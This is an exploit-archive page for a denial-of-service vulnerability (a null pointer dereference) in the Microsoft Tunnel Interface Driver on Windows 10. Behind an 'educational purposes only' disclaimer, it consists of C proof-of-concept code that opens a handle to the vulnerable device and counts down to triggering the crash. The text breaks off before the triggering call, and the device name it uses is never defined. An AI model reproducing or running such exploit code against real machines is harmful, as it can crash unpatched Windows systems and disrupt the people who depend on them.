Tunnel interface driver denial of service Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-03-28 |
Type : dos |
Platform : windows
This exploit / vulnerability Tunnel interface driver denial of service is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
// Exploit Title: Tunnel Interface Driver - Denial of Service
// Date: 07/15/2022
// Exploit Author: ExAllocatePool2
// Vendor Homepage: https://www.microsoft.com/
// Software Link: https://www.microsoft.com/en-us/software-download/windows10
// Version: Windows 10 Pro Version 21H2 (OS Build 19044.1288)
// Tested on: Microsoft Windows
// GitHub Repository: https://github.com/Exploitables/MSRC-1
int main(int argc, char** argv)
{
HANDLE h_driver = CreateFileA(TARGET_DEVICE, 0x80, 0, 0, OPEN_EXISTING, 0, 0);
unsigned long long input_output = 0x4242424242424242;
unsigned long bytes_returned = 0x43434343;
unsigned char unused = 0;
SetConsoleTitleA("https://msrc.microsoft.com/");
printf("[*] Microsoft Security and Response Center Report #1\n[*] Microsoft Tunnel Interface Driver Null Pointer Dereference Denial of Service Vulnerability\n[*] Exploit written by ExAllocatePool2\n[!] Let's exploit!");
if (h_driver == (HANDLE)-1)
{
printf("\n[-] Failed to obtain a handle to the vulnerable device driver. Error: %d (0x%x)", GetLastError(), GetLastError());
unused = getchar();
return 1;
}
printf("\n[+] Obtained a handle to the vulnerable device driver. Handle Value: 0x%p", h_driver);
printf("\n[!] Triggering a denial of service via arbitrary read in 3...");
for (int i = 2; i > 0; i--)
{
Sleep(1000);
printf("\n[!] %d...", i);
}